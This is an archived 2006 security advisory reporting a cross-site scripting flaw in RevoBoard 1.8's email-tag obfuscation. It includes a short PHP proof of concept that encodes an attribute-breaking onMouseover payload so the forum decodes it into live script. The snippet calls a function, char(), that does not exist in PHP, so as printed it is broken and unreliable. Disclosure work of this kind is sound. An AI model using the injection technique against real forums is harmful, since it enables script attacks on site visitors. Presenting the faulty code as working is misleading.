RevoBoard-v1.8.txt

RevoBoard-v1.8.txt: Posted Apr 19, 2006; Authored by r0xes | Site criticalsecurity.net; Revoboard 1.8 suffers from XSS in its email tag obfuscation scheme.; tags | advisory; SHA-256 | 8a5564004fe46f56554910ffff51490c93f52913d7f7f8040e6bdd3487547fc9; Download | Favorite | View

RevoBoard-v1.8.txt

Revoboard (php) is based on an earlier version of PunBB.
I know for sure that this affects v1.8.

The email tag parser obsfucates emails to stop harvesters. To execute code, do this: 
[php]
$code = '\'" onMouseover="javascript:alert(/xss/)">';
for($a=0;$a<strlen($code);$a++){
     $c = ord(substr($code,$a,1));
     $c += intval(-2);
     $str .= char($c);
}
print $str;
[/php]

And you just paste $str into the tag =).

r0xes

dynxss.whiteacid.org
criticalsecurity.net

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 64 files
Debian 22 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,175)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,140)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,480)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,022)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

RevoBoard-v1.8.txt

RevoBoard-v1.8.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

RevoBoard-v1.8.txt

Share This

RevoBoard-v1.8.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems